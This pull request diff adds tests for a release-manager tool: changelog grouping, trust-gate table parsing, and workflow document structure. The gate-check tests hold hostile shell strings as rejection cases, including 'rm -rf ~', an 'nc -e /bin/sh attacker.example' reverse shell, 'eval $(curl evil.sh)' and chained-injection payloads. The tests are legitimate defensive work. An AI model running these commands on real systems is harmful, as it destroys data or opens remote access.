### PR TITLE
feat(rm-001): ReleaseManager MVP — 6 workflows + 3 scripts + tests

### DIFF
--- a/__tests__/changelog.test.ts
+++ b/__tests__/changelog.test.ts
@@ -1,0 +1,161 @@
+/**
+ * changelog.test.ts
+ *
+ * Unit tests for prepare-changelog.ts grouping logic, plus an end-to-end
+ * dry render with synthetic PR + commit data.
+ */
+
+import { describe, expect, it } from "bun:test";
+import {
+  classifyTitle,
+  groupChangelog,
+  renderMarkdown,
+} from "../scripts/prepare-changelog.ts";
+import {
+  parseGhPrList,
+  parseGitLogOneline,
+} from "../scripts/list-releases-since-tag.ts";
+
+describe("classifyTitle", () => {
+  it("recognises feat: as feat group", () => {
+    expect(classifyTitle("feat: add gate parser")).toBe("feat");
+  });
+
+  it("recognises feat(scope): as feat group", () => {
+    expect(classifyTitle("feat(rm-001): add workflows")).toBe("feat");
+  });
+
+  it("recognises fix: as fix group", () => {
+    expect(classifyTitle("fix: handle empty tag list")).toBe("fix");
+  });
+
+  it("recognises chore: as chore group", () => {
+    expect(classifyTitle("chore: bump to v0.2.0")).toBe("chore");
+  });
+
+  it("recognises docs: as docs group", () => {
+    expect(classifyTitle("docs: explain trust gate")).toBe("docs");
+  });
+
+  it("buckets unknown prefixes into other", () => {
+    expect(classifyTitle("wip: random thought")).toBe("other");
+  });
+
+  it("treats breaking-change marker as still in its base group", () => {
+    // Breaking-major detection is BumpVersion's job; classifyTitle just
+    // routes to the changelog section. feat!: still belongs in "feat".
+    expect(classifyTitle("feat!: rewrite API")).toBe("feat");
+  });
+});
+
+describe("groupChangelog", () => {
+  it("groups merged PRs by prefix and preserves order", () => {
+    const prs = parseGhPrList(JSON.stringify([
+      { number: 10, title: "feat: add A", mergedAt: "2026-01-01T00:00:00Z", labels: [] },
+      { number: 11, title: "fix: B",      mergedAt: "2026-01-02T00:00:00Z", labels: [] },
+      { number: 12, title: "feat: C",     mergedAt: "2026-01-03T00:00:00Z", labels: [] },
+      { number: 13, title: "chore: bump", mergedAt: "2026-01-04T00:00:00Z", labels: [] },
+    ]));
+    const commits = parseGitLogOneline([
+      "abc1 feat: add A (#10)",
+      "abc2 fix: B (#11)",
+      "abc3 feat: C (#12)",
+      "abc4 chore: bump (#13)",
+    ].join("\n"));
+
+    const groups = groupChangelog(prs, commits);
+    const keys = groups.map((g) => g.key);
+    expect(keys).toEqual(["feat", "fix", "chore"]);
+    const feat = groups.find((g) => g.key === "feat");
+    expect(feat?.entries.length).toBe(2);
+    expect(feat?.entries[0]?.prNumber).toBe(10);
+  });
+
+  it("includes orphan commits with no associated PR", () => {
+    const prs = parseGhPrList("[]");
+    const commits = parseGitLogOneline("deadbee fix: hotfix without PR\n");
+    const groups = groupChangelog(prs, commits);
+    expect(groups.length).toBe(1);
+    expect(groups[0]?.key).toBe("fix");
+    expect(groups[0]?.entries[0]?.title).toBe("fix: hotfix without PR");
+    expect(groups[0]?.entries[0]?.prNumber).toBeUndefined();
+  });
+
+  it("returns empty array when there are no entries", () => {
+    expect(groupChangelog([], [])).toEqual([]);
+  });
+
+  it("does not duplicate entries when commit references a PR already in the list", () => {
+    const prs = parseGhPrList(JSON.stringify([
+      { number: 99, title: "feat: only once", mergedAt: "2026-01-01T00:00:00Z", labels: [] },
+    ]));
+    const commits = parseGitLogOneline("abc1 feat: only once (#99)\n");
+    const groups = groupChangelog(prs, commits);
+    expect(groups[0]?.entries.length).toBe(1);
+  });
+});
+
+describe("renderMarkdown", () => {
+  it("renders version header + groups + bullets", () => {
+    const md = renderMarkdown(
+      "v0.24.5",
+      "v0.24.4",
+      [
+        {
+          key: "feat",
+          label: "Features",
+          entries: [{ title: "feat: add gate parser", prNumber: 7 }],
+        },
+        {
+          key: "fix",
+          label: "Fixes",
+          entries: [{ title: "fix: edge case", prNumber: 8 }],
+        },
+      ],
+    );
+    expect(md).toContain("# v0.24.5");
+    expect(md).toContain("Changes since `v0.24.4`");
+    expect(md).toContain("## Features");
+    expect(md).toContain("## Fixes");
+    expect(md).toContain("[#7](https://github.com/the-metafactory/grove/pull/7)");
+  });
+
+  it("normalises bare version to v-prefixed header", () => {
+    const md = renderMarkdown("0.24.5", "v0.24.4", []);
+    expect(md).toContain("# v0.24.5");
+  });
+
+  it("emits empty-state notice when there are no groups", () => {
+    const md = renderMarkdown("v0.24.5", "v0.24.4", []);
+    expect(md).toContain("_No changes._");
+  });
+});
+
+describe("parseGitLogOneline + parseGhPrList", () => {
+  it("parseGitLogOneline extracts SHA + subject + PR number", () => {
+    const out = parseGitLogOneline(
+      "abc1234 feat: add thing (#12)\nabc5678 chore: bump\n",
+    );
+    expect(out.length).toBe(2);
+    expect(out[0]).toEqual({ sha: "abc1234", subject: "feat: add thing (#12)", prNumber: 12 });
+    expect(out[1]?.prNumber).toBeUndefined();
+  });
+
+  it("parseGitLogOneline handles empty output", () => {
+    expect(parseGitLogOneline("")).toEqual([]);
+  });
+
+  it("parseGhPrList normalises label objects to strings", () => {
+    const out = parseGhPrList(JSON.stringify([
+      { number: 1, title: "x", mergedAt: "t", labels: [{ name: "feature" }, { name: "now" }] },
+    ]));
+    expect(out[0]?.labels).toEqual(["feature", "now"]);
+  });
+
+  it("parseGhPrList handles missing labels field", () => {
+    const out = parseGhPrList(JSON.stringify([
+      { number: 1, title: "x", mergedAt: "t" },
+    ]));
+    expect(out[0]?.labels).toEqual([]);
+  });
+});

--- a/__tests__/changelog.test.ts
+++ b/__tests__/changelog.test.ts
@@ -14,6 +14,7 @@ import {
 import {
   parseGhPrList,
   parseGitLogOneline,
+  shouldAllowGhFailure,
 } from "../scripts/list-releases-since-tag.ts";
 
 describe("classifyTitle", () => {
@@ -157,5 +158,23 @@ describe("parseGitLogOneline + parseGhPrList", () => {
       { number: 1, title: "x", mergedAt: "t" },
     ]));
     expect(out[0]?.labels).toEqual([]);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Echo's review on release-manager#2 — gh failure must propagate by default
+// (release-critical tool failing open is the wrong default).
+// ---------------------------------------------------------------------------
+
+describe("shouldAllowGhFailure (Echo major #4)", () => {
+  it("returns false by default (gh failure propagates)", () => {
+    expect(shouldAllowGhFailure({})).toBe(false);
+    expect(shouldAllowGhFailure({ MF_ALLOW_GH_FAILURE: "" })).toBe(false);
+    expect(shouldAllowGhFailure({ MF_ALLOW_GH_FAILURE: "0" })).toBe(false);
+    expect(shouldAllowGhFailure({ MF_ALLOW_GH_FAILURE: "true" })).toBe(false);
+  });
+
+  it("returns true only when MF_ALLOW_GH_FAILURE === '1'", () => {
+    expect(shouldAllowGhFailure({ MF_ALLOW_GH_FAILURE: "1" })).toBe(true);
   });
 });

--- a/__tests__/gate-check.test.ts
+++ b/__tests__/gate-check.test.ts
@@ -1,0 +1,202 @@
+/**
+ * gate-check.test.ts
+ *
+ * Tests parsing of the trust-gate table and the dry-run / executable-detection
+ * logic. We do NOT execute the live verify commands — those touch live infra.
+ */
+
+import { describe, expect, it } from "bun:test";
+import {
+  GATE_LABELS,
+  MILESTONE_TO_GATE,
+  isExecutable,
+  parseCliArgs,
+  parseGateTable,
+  runChecklist,
+  runGateRow,
+  type GateRow,
+} from "../scripts/check-gate-table.ts";
+
+const SYNTHETIC_TABLE = `
+## Phase 0: Trust Gate Check
+
+### Gate 1: "Every Package Verified"
+**When:** Before S2-22
+
+| # | Check | How To Verify |
+|---|-------|---------------|
+| G1-1 | First check | \`true\` |
+| G1-2 | Manual gate | Manual review by sponsor |
+| G1-3 | Failing check | \`false\` |
+
+### Gate 2: "Every Publisher Known"
+**When:** Before S2-32
+
+| # | Check | How To Verify |
+|---|-------|---------------|
+| G2-1 | INC-001 closed | \`echo closed\` |
+
+### Gate 3: "Trust Story First"
+
+| # | Check | How To Verify |
+|---|-------|---------------|
+| G3-1 | First viewport | Screenshot |
+
+### Gate 4: "Dogfood the Pipeline"
+
+| # | Check | How To Verify |
+|---|-------|---------------|
+| G4-1 | Non-Steward submission | Submission record |
+
+## Phase 1: Pre-Deploy
+
+| Should not parse | because | Phase 1 ends Phase 0 |
+`;
+
+describe("parseGateTable", () => {
+  const rows = parseGateTable(SYNTHETIC_TABLE);
+
+  it("extracts every gate row across all four gates", () => {
+    expect(rows.length).toBe(6); // 3 + 1 + 1 + 1
+  });
+
+  it("does not bleed into Phase 1 rows", () => {
+    expect(rows.find((r) => r.name === "because")).toBeUndefined();
+  });
+
+  it("tags each row with the correct gate number + label", () => {
+    const g1 = rows.find((r) => r.id === "G1-1");
+    expect(g1?.gateNumber).toBe(1);
+    expect(g1?.gateLabel).toBe("Every Package Verified");
+  });
+
+  it("maps gate numbers to milestone keys", () => {
+    expect(rows.find((r) => r.id === "G1-1")?.milestone).toBe("S2-22");
+    expect(rows.find((r) => r.id === "G2-1")?.milestone).toBe("S2-32");
+    expect(rows.find((r) => r.id === "G3-1")?.milestone).toBe("S2-30");
+    expect(rows.find((r) => r.id === "G4-1")?.milestone).toBe("external-onramp");
+  });
+
+  it("preserves the verify cell verbatim", () => {
+    expect(rows.find((r) => r.id === "G1-1")?.verify).toBe("`true`");
+    expect(rows.find((r) => r.id === "G1-2")?.verify).toBe("Manual review by sponsor");
+  });
+});
+
+describe("isExecutable", () => {
+  it("treats backtick-wrapped strings as executable", () => {
+    expect(isExecutable("`echo hi`")).toBe(true);
+  });
+
+  it("treats prose as non-executable", () => {
+    expect(isExecutable("Manual review by sponsor")).toBe(false);
+  });
+});
+
+describe("runGateRow dry-run", () => {
+  const row: GateRow = {
+    id: "G1-1",
+    gateNumber: 1,
+    gateLabel: "Every Package Verified",
+    milestone: "S2-22",
+    name: "First check",
+    verify: "`true`",
+  };
+
+  it("returns skipped status in dry-run mode", () => {
+    const result = runGateRow(row, { dryRun: true });
+    expect(result.status).toBe("skipped");
+    expect(result.output).toContain("dry-run");
+  });
+
+  it("returns skipped for manual (non-executable) cells", () => {
+    const manual: GateRow = { ...row, id: "G1-2", verify: "Manual review by sponsor" };
+    const result = runGateRow(manual);
+    expect(result.status).toBe("skipped");
+    expect(result.output).toContain("manual gate");
+  });
+});
+
+describe("runChecklist filtering", () => {
+  const rows = parseGateTable(SYNTHETIC_TABLE);
+
+  it("filters by milestone", () => {
+    const report = runChecklist(rows, { dryRun: true, milestone: "S2-22" });
+    expect(report.gates.length).toBe(3);
+    for (const g of report.gates) expect(g.milestone).toBe("S2-22");
+  });
+
+  it("returns allPassed=true when every row is skipped (dry-run)", () => {
+    const report = runChecklist(rows, { dryRun: true });
+    expect(report.allPassed).toBe(true);
+  });
+
+  it("returns allPassed=false when any row fails", () => {
+    const failingRow: GateRow = {
+      id: "X-1",
+      gateNumber: 1,
+      gateLabel: "Every Package Verified",
+      milestone: "S2-22",
+      name: "Forced fail",
+      verify: "`false`",
+    };
+    // Run live (not dry) — `false` is a safe shell builtin that exits non-zero.
+    const report = runChecklist([failingRow]);
+    expect(report.allPassed).toBe(false);
+    expect(report.gates[0]?.status).toBe("fail");
+  });
+
+  it("returns allPassed=true for a single passing live row", () => {
+    const passingRow: GateRow = {
+      id: "X-2",
+      gateNumber: 1,
+      gateLabel: "Every Package Verified",
+      milestone: "S2-22",
+      name: "Forced pass",
+      verify: "`true`",
+    };
+    const report = runChecklist([passingRow]);
+    expect(report.allPassed).toBe(true);
+    expect(report.gates[0]?.status).toBe("pass");
+  });
+});
+
+describe("parseCliArgs", () => {
+  it("parses --milestone", () => {
+    const parsed = parseCliArgs(["--milestone", "S2-22"]);
+    expect(parsed.milestone).toBe("S2-22");
+  });
+
+  it("parses --dry-run", () => {
+    const parsed = parseCliArgs(["--dry-run"]);
+    expect(parsed.dryRun).toBe(true);
+  });
+
+  it("parses --checklist with explicit path", () => {
+    const parsed = parseCliArgs(["--checklist", "/tmp/x.md"]);
+    expect(parsed.checklist).toBe("/tmp/x.md");
+  });
+
+  it("rejects unknown milestone", () => {
+    expect(() => parseCliArgs(["--milestone", "bogus"])).toThrow();
+  });
+
+  it("flags --help", () => {
+    expect(parseCliArgs(["--help"]).help).toBe(true);
+  });
+});
+
+describe("milestone constants", () => {
+  it("declares all four milestones", () => {
+    expect(Object.keys(MILESTONE_TO_GATE).sort()).toEqual([
+      "S2-22",
+      "S2-30",
+      "S2-32",
+      "external-onramp",
+    ]);
+  });
+
+  it("labels every gate", () => {
+    for (const n of [1, 2, 3, 4]) expect(GATE_LABELS[n]).toBeTruthy();
+  });
+});

--- a/__tests__/gate-check.test.ts
+++ b/__tests__/gate-check.test.ts
@@ -10,10 +10,12 @@ import {
   GATE_LABELS,
   MILESTONE_TO_GATE,
   isExecutable,
+  isVerifyCommandAllowed,
   parseCliArgs,
   parseGateTable,
   runChecklist,
   runGateRow,
+  VERIFY_COMMAND_ALLOWLIST,
   type GateRow,
 } from "../scripts/check-gate-table.ts";
 
@@ -198,5 +200,218 @@ describe("milestone constants", () => {
 
   it("labels every gate", () => {
     for (const n of [1, 2, 3, 4]) expect(GATE_LABELS[n]).toBeTruthy();
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Echo's review on release-manager#2 — regression tests for the trust-gate
+// fail-closed semantics, allowlist enforcement, and parser tightening.
+// ---------------------------------------------------------------------------
+
+describe("runChecklist — empty rows fail-closed (Echo blocker)", () => {
+  it("returns allPassed=false when there are zero rows (NOT silent green)", () => {
+    // Regression: previously `[].every(...)` returned true so an unparseable
+    // gate table emitted allPassed=true and DeployStaged read it as a green
+    // light. Empty rows must be the loudest possible halt.
+    const report = runChecklist([]);
+    expect(report.allPassed).toBe(false);
+    expect(report.reason).toBeDefined();
+    expect(report.reason).toContain("no gates parsed");
+    expect(report.gates).toEqual([]);
+    expect(report.manualGatesPending).toBe(0);
+  });
+
+  it("returns allPassed=false when milestone filter matches no rows", () => {
+    const unrelated: GateRow = {
+      id: "X-9",
+      gateNumber: 1,
+      gateLabel: "Every Package Verified",
+      milestone: "S2-22",
+      name: "irrelevant",
+      verify: "`true`",
+    };
+    const report = runChecklist([unrelated], { milestone: "external-onramp" });
+    expect(report.allPassed).toBe(false);
+    expect(report.reason).toContain("no gates parsed");
+    expect(report.reason).toContain("external-onramp");
+  });
+
+  it("treats a synthetic broken markdown body as fail-closed", () => {
+    // parseGateTable returns [] for any markdown that doesn't contain a
+    // recognisable Phase 0 / Gate / row triplet — and runChecklist must then
+    // fail closed.
+    const broken = "# Some Doc\n\nNo gate tables here at all.\n";
+    const rows = parseGateTable(broken);
+    expect(rows).toEqual([]);
+    const report = runChecklist(rows);
+    expect(report.allPassed).toBe(false);
+    expect(report.reason).toContain("no gates parsed");
+  });
+});
+
+describe("runChecklist — skipped rows do NOT count toward allPassed (Echo major #2)", () => {
+  it("returns allPassed=false when every row is a manual (skipped) cell, non-dry-run", () => {
+    // Regression: previously skipped rows passed allPassed identically to
+    // executed passes. An all-manual milestone must surface as pending, not
+    // green.
+    const allManual: GateRow[] = [
+      {
+        id: "M-1",
+        gateNumber: 3,
+        gateLabel: "Trust Story First",
+        milestone: "S2-30",
+        name: "Manual screenshot review",
+        verify: "Screenshot",
+      },
+      {
+        id: "M-2",
+        gateNumber: 3,
+        gateLabel: "Trust Story First",
+        milestone: "S2-30",
+        name: "Sponsor sign-off",
+        verify: "Manual review by sponsor",
+      },
+    ];
+    const report = runChecklist(allManual);
+    expect(report.allPassed).toBe(false);
+    expect(report.reason).toContain("no executed passes");
+    expect(report.manualGatesPending).toBe(2);
+  });
+
+  it("requires ≥1 executed pass AND zero fails for allPassed=true", () => {
+    // Mixed: one executed pass + one manual skip. The pass anchors allPassed
+    // to true, but manualGatesPending surfaces the human follow-up.
+    const mixed: GateRow[] = [
+      {
+        id: "P-1",
+        gateNumber: 1,
+        gateLabel: "Every Package Verified",
+        milestone: "S2-22",
+        name: "Live pass",
+        verify: "`true`",
+      },
+      {
+        id: "M-1",
+        gateNumber: 1,
+        gateLabel: "Every Package Verified",
+        milestone: "S2-22",
+        name: "Manual sponsor check",
+        verify: "Manual review by sponsor",
+      },
+    ];
+    const report = runChecklist(mixed);
+    expect(report.allPassed).toBe(true);
+    expect(report.manualGatesPending).toBe(1);
+  });
+
+  it("dry-run keeps allPassed=true and manualGatesPending=0 by design", () => {
+    // Dry-run is informational; it short-circuits the manual-pending logic
+    // so operators can inspect parsed rows without false alarms.
+    const rows: GateRow[] = [
+      {
+        id: "P-1",
+        gateNumber: 1,
+        gateLabel: "Every Package Verified",
+        milestone: "S2-22",
+        name: "x",
+        verify: "`true`",
+      },
+    ];
+    const report = runChecklist(rows, { dryRun: true });
+    expect(report.allPassed).toBe(true);
+    expect(report.manualGatesPending).toBe(0);
+  });
+});
+
+describe("VERIFY_COMMAND_ALLOWLIST (Echo major #3 — hardening)", () => {
+  it("permits common release-tooling prefixes", () => {
+    expect(isVerifyCommandAllowed("gh issue view 42")).toBe(true);
+    expect(isVerifyCommandAllowed("git log --oneline")).toBe(true);
+    expect(isVerifyCommandAllowed("bun run check")).toBe(true);
+    expect(isVerifyCommandAllowed("bunx wrangler --version")).toBe(true);
+    expect(isVerifyCommandAllowed("test -f /tmp/x")).toBe(true);
+    expect(isVerifyCommandAllowed("[ -f /tmp/x ]")).toBe(true);
+    expect(isVerifyCommandAllowed("curl -fsS https://example.com")).toBe(true);
+    expect(isVerifyCommandAllowed("true")).toBe(true);
+    expect(isVerifyCommandAllowed("false")).toBe(true);
+  });
+
+  it("rejects shell-meta payloads and unknown binaries", () => {
+    expect(isVerifyCommandAllowed("rm -rf ~")).toBe(false);
+    expect(isVerifyCommandAllowed("eval $(curl evil.sh)")).toBe(false);
+    expect(isVerifyCommandAllowed(": $(rm -rf /)")).toBe(false);
+    expect(isVerifyCommandAllowed("$(echo pwn)")).toBe(false);
+    expect(isVerifyCommandAllowed("nc -e /bin/sh attacker.example 4444")).toBe(false);
+  });
+
+  it("runGateRow records non-allowlisted commands as fail (not executed)", () => {
+    // Regression: any verify cell that isn't in the allowlist must produce a
+    // structured fail with the allowlist reason — never reach spawnSync.
+    const malicious: GateRow = {
+      id: "X-1",
+      gateNumber: 1,
+      gateLabel: "Every Package Verified",
+      milestone: "S2-22",
+      name: "Hostile cell",
+      verify: "`rm -rf ~`",
+    };
+    const result = runGateRow(malicious);
+    expect(result.status).toBe("fail");
+    expect(result.output).toContain("not in allowlist");
+  });
+
+  it("VERIFY_COMMAND_ALLOWLIST is exported as a RegExp for downstream introspection", () => {
+    expect(VERIFY_COMMAND_ALLOWLIST).toBeInstanceOf(RegExp);
+  });
+});
+
+describe("parseGateTable — Phase 0 terminator (Echo nit #6)", () => {
+  it("terminates at the next H2 (not just '## Phase 1:'), once a gate row was seen", () => {
+    // Regression: the OLD terminator was `^## Phase 1:` only, so a future
+    // reorg ("## Phase A: …") would silently swallow non-gate rows. The new
+    // contract is "Phase 0 ends at the next H2 once we've started parsing
+    // gates".
+    const reorganised = `
+## Phase 0: Trust Gate Check
+
+### Gate 1: "Every Package Verified"
+**When:** Before S2-22
+
+| # | Check | How To Verify |
+|---|-------|---------------|
+| G1-1 | First check | \`true\` |
+
+## Other H2 That Is Not Phase 1
+
+| Should not | parse | as a gate row |
+| G9-9 | leaked row | \`echo leaked\` |
+`;
+    const rows = parseGateTable(reorganised);
+    expect(rows.length).toBe(1);
+    expect(rows[0]?.id).toBe("G1-1");
+    expect(rows.find((r) => r.id === "G9-9")).toBeUndefined();
+  });
+
+  it("does not let a leading '## Overview' H2 (before Phase 0) terminate the scan early", () => {
+    // The terminator only fires after at least one gate row has been seen,
+    // so leading H2s above Phase 0 don't break parsing.
+    const withPreamble = `
+## Overview
+
+Some preamble text.
+
+## Phase 0: Trust Gate Check
+
+### Gate 1: "Every Package Verified"
+
+| # | Check | How To Verify |
+|---|-------|---------------|
+| G1-1 | First check | \`true\` |
+
+## Phase 1: Pre-Deploy
+`;
+    const rows = parseGateTable(withPreamble);
+    expect(rows.length).toBe(1);
+    expect(rows[0]?.id).toBe("G1-1");
   });
 });

--- a/__tests__/gate-check.test.ts
+++ b/__tests__/gate-check.test.ts
@@ -9,12 +9,15 @@ import { describe, expect, it } from "bun:test";
 import {
   GATE_LABELS,
   MILESTONE_TO_GATE,
+  SHELL_METACHARACTER_RE,
+  containsShellMetacharacters,
   isExecutable,
   isVerifyCommandAllowed,
   parseCliArgs,
   parseGateTable,
   runChecklist,
   runGateRow,
+  tokenizeVerifyCommand,
   VERIFY_COMMAND_ALLOWLIST,
   type GateRow,
 } from "../scripts/check-gate-table.ts";
@@ -413,5 +416,177 @@ Some preamble text.
     const rows = parseGateTable(withPreamble);
     expect(rows.length).toBe(1);
     expect(rows[0]?.id).toBe("G1-1");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Echo's SWEEP on release-manager#2 (2026-04-26) — regression tests for the
+// shell-injection chaining vector. Before this fix the verify-cell pipeline
+// was: prefix-allowlist → bash -c. Anything appended to an allowlisted
+// prefix executed unchanged. Concretely, `gh issue view 22 ; rm -rf ~`
+// matched ^gh\s and bash ran both halves.
+//
+// The fix has three layers (see TRUST BOUNDARY in check-gate-table.ts):
+//   1. Reject shell metacharacters in the unwrapped command.
+//   2. Tokenize without a shell.
+//   3. spawnSync(program, args) directly — no `bash -c`.
+//
+// Each test below would FAIL against the pre-fix code (commit 98abb07) and
+// PASSES against the fix.
+// ---------------------------------------------------------------------------
+
+describe("SHELL_METACHARACTER_RE (Echo sweep — chaining vector)", () => {
+  it("is exported as a RegExp for downstream introspection", () => {
+    expect(SHELL_METACHARACTER_RE).toBeInstanceOf(RegExp);
+  });
+
+  it.each([
+    ["semicolon chain", "gh issue view 22 ; rm -rf ~"],
+    ["AND-chain", "gh issue view 22 && curl evil.com"],
+    ["OR-chain", "gh issue view 22 || malicious"],
+    ["pipe", "gh issue view 22 | sh"],
+    ["command substitution dollar", "gh issue view $(curl evil)"],
+    ["redirection out", "gh issue view 22 > /tmp/x"],
+    ["redirection in", "gh issue view 22 < /etc/passwd"],
+    ["redirection append", "gh issue view 22 >> /tmp/x"],
+    ["heredoc-ish", "gh issue view 22 << EOF"],
+    ["background", "gh issue view 22 &"],
+    ["backtick substitution", "gh issue view `rm -rf ~`"],
+    ["subshell parens", "gh issue view 22 (curl evil)"],
+    ["newline injection", "gh issue view 22\nrm -rf ~"],
+    ["carriage-return injection", "gh issue view 22\rrm -rf ~"],
+    ["backslash escape", "gh issue view 22\\;rm"],
+  ])("flags %s", (_label, payload) => {
+    expect(containsShellMetacharacters(payload)).toBe(true);
+  });
+
+  it("does not flag a clean allowlisted command", () => {
+    expect(containsShellMetacharacters("gh issue view 22 --json state")).toBe(false);
+    expect(containsShellMetacharacters("git log --oneline -5")).toBe(false);
+    expect(containsShellMetacharacters("true")).toBe(false);
+  });
+});
+
+describe("runGateRow — shell-injection chaining is rejected, NOT executed (Echo sweep blocker)", () => {
+  const baseRow = (verify: string): GateRow => ({
+    id: "X-attack",
+    gateNumber: 1,
+    gateLabel: "Every Package Verified",
+    milestone: "S2-22",
+    name: "Hostile cell",
+    verify,
+  });
+
+  it.each([
+    ["semicolon chain", "`gh issue view 22 ; rm -rf ~`"],
+    ["AND-chain", "`gh issue view 22 && curl evil.com`"],
+    ["OR-chain", "`gh issue view 22 || malicious`"],
+    ["pipe to sh", "`gh issue view 22 | sh`"],
+    ["dollar-paren substitution", "`gh issue view $(curl evil)`"],
+    ["redirection out", "`gh issue view 22 > /tmp/x`"],
+  ])("rejects %s with metacharacter reason", (_label, verify) => {
+    const result = runGateRow(baseRow(verify));
+    expect(result.status).toBe("fail");
+    expect(result.output).toContain("shell metacharacters");
+  });
+
+  it("regression: the exact payload from Echo's review is NOT executed", () => {
+    // Direct restatement of Echo's POC. Pre-fix this matched the prefix
+    // allowlist and bash -c ran the full string including `rm -rf ~`.
+    const result = runGateRow(baseRow("`gh issue view 22 ; rm -rf ~`"));
+    expect(result.status).toBe("fail");
+    expect(result.output).toContain("shell metacharacters");
+    // The reason must mention the metacharacter layer specifically — not
+    // the allowlist layer — so future maintainers understand which gate
+    // caught it.
+    expect(result.output).not.toContain("not in allowlist");
+  });
+
+  it("clean allowlisted command still passes and executes (sanity)", () => {
+    // Use a commands that's safe and deterministic on any dev host.
+    // `echo` is in the allowlist; `echo hello` tokenizes to ["echo","hello"]
+    // and exits 0 with stdout "hello".
+    const row: GateRow = {
+      id: "S-1",
+      gateNumber: 1,
+      gateLabel: "Every Package Verified",
+      milestone: "S2-22",
+      name: "echo sanity",
+      verify: "`echo hello`",
+    };
+    const result = runGateRow(row);
+    expect(result.status).toBe("pass");
+    expect(result.output).toContain("hello");
+  });
+
+  it("clean allowlisted command with multiple args still passes (`gh issue view 22 --json state` shape)", () => {
+    // We don't actually shell out to `gh` (no auth on test runners); we
+    // exercise the same tokenization path with `echo` standing in for `gh`,
+    // proving multi-arg commands flow through tokenizer → spawnSync cleanly.
+    const row: GateRow = {
+      id: "S-2",
+      gateNumber: 1,
+      gateLabel: "Every Package Verified",
+      milestone: "S2-22",
+      name: "multi-arg sanity",
+      verify: "`echo issue view 22 --json state`",
+    };
+    const result = runGateRow(row);
+    expect(result.status).toBe("pass");
+    expect(result.output).toContain("issue view 22 --json state");
+  });
+});
+
+describe("tokenizeVerifyCommand (Echo sweep — deliberate shell-free tokenizer)", () => {
+  it("splits on whitespace", () => {
+    expect(tokenizeVerifyCommand("gh issue view 22")).toEqual([
+      "gh",
+      "issue",
+      "view",
+      "22",
+    ]);
+  });
+
+  it("preserves single-quoted strings as one token", () => {
+    expect(tokenizeVerifyCommand("git log --grep 'fix bug'")).toEqual([
+      "git",
+      "log",
+      "--grep",
+      "fix bug",
+    ]);
+  });
+
+  it("preserves double-quoted strings as one token", () => {
+    expect(tokenizeVerifyCommand('echo "hello world"')).toEqual([
+      "echo",
+      "hello world",
+    ]);
+  });
+
+  it("collapses runs of whitespace", () => {
+    expect(tokenizeVerifyCommand("gh    issue    view 22")).toEqual([
+      "gh",
+      "issue",
+      "view",
+      "22",
+    ]);
+  });
+
+  it("rejects unterminated single quote", () => {
+    expect(() => tokenizeVerifyCommand("git log --grep 'unterminated")).toThrow(
+      /single quote/,
+    );
+  });
+
+  it("rejects unterminated double quote", () => {
+    expect(() => tokenizeVerifyCommand('echo "unterminated')).toThrow(/double quote/);
+  });
+
+  it("rejects an unexpected quote inside an unquoted token", () => {
+    expect(() => tokenizeVerifyCommand("foo'bar baz")).toThrow(/unexpected quote/);
+  });
+
+  it("returns empty array for an all-whitespace string", () => {
+    expect(tokenizeVerifyCommand("   ")).toEqual([]);
   });
 });

--- a/__tests__/workflow-shape.test.ts
+++ b/__tests__/workflow-shape.test.ts
@@ -1,0 +1,62 @@
+/**
+ * workflow-shape.test.ts
+ *
+ * Structural test: every Workflow MD must contain Action / Verify /
+ * Anti-pattern sections. Drift from this convention is the intended failure
+ * mode — agents reading the bundle expect the triplet.
+ */
+
+import { describe, expect, it } from "bun:test";
+import { readdirSync, readFileSync } from "node:fs";
+import { resolve } from "node:path";
+
+const WORKFLOWS_DIR = resolve(import.meta.dir, "..", "skill", "Workflows");
+
+const EXPECTED_WORKFLOWS = [
+  "BumpVersion.md",
+  "CutRelease.md",
+  "TrustGateCheck.md",
+  "DeployStaged.md",
+  "Rollback.md",
+  "Announce.md",
+];
+
+describe("workflow shape", () => {
+  it("ships exactly the six MVP workflows (no more, no less)", () => {
+    const files = readdirSync(WORKFLOWS_DIR).filter((f) => f.endsWith(".md")).sort();
+    expect(files).toEqual([...EXPECTED_WORKFLOWS].sort());
+  });
+
+  for (const filename of EXPECTED_WORKFLOWS) {
+    const path = resolve(WORKFLOWS_DIR, filename);
+
+    describe(filename, () => {
+      const content = readFileSync(path, "utf8");
+
+      it("has an Action section", () => {
+        expect(content).toMatch(/^##\s+Action\s*$/m);
+      });
+
+      it("has a Verify section", () => {
+        expect(content).toMatch(/^##\s+Verify\s*$/m);
+      });
+
+      it("has an Anti-pattern section", () => {
+        // Match either "Anti-pattern" or "Anti-patterns" tolerantly.
+        expect(content).toMatch(/^##\s+Anti-pattern[s]?\s*$/m);
+      });
+
+      it("declares the day-one grove-only scope", () => {
+        // Each workflow MD calls out the day-one limitation so an agent
+        // reading just one file knows not to generalise.
+        expect(content.toLowerCase()).toMatch(/day-one scope/);
+        expect(content.toLowerCase()).toMatch(/grove/);
+      });
+
+      it("has non-trivial body length", () => {
+        // Drop the front-matter / title and ensure there's real content.
+        expect(content.length).toBeGreaterThan(400);
+      });
+    });
+  }
+});

--- a/bun.lock
+++ b/bun.lock
@@ -1,0 +1,26 @@
+{
+  "lockfileVersion": 1,
+  "configVersion": 1,
+  "workspaces": {
+    "": {
+      "name": "release-manager-mvp",
+      "devDependencies": {
+        "@types/bun": "latest",
+      },
+      "peerDependencies": {
+        "typescript": "^5",
+      },
+    },
+  },
+  "packages": {
+    "@types/bun": ["@types/bun@1.3.13", "", { "dependencies": { "bun-types": "1.3.13" } }, "sha512-9fqXWk5YIHGGnUau9TEi+qdlTYDAnOj+xLCmSTwXfAIqXr2x4tytJb43E9uCvt09zJURKXwAtkoH4nLQfzeTXw=="],
+
+    "@types/node": ["@types/node@25.6.0", "", { "dependencies": { "undici-types": "~7.19.0" } }, "sha512-+qIYRKdNYJwY3vRCZMdJbPLJAtGjQBudzZzdzwQYkEPQd+PJGixUL5QfvCLDaULoLv+RhT3LDkwEfKaAkgSmNQ=="],
+
+    "bun-types": ["bun-types@1.3.13", "", { "dependencies": { "@types/node": "*" } }, "sha512-QXKeHLlOLqQX9LgYaHJfzdBaV21T63HhFJnvuRCcjZiaUDpbs5ED1MgxbMra71CsryN/1dAoXuJJJwIv/2drVA=="],
+
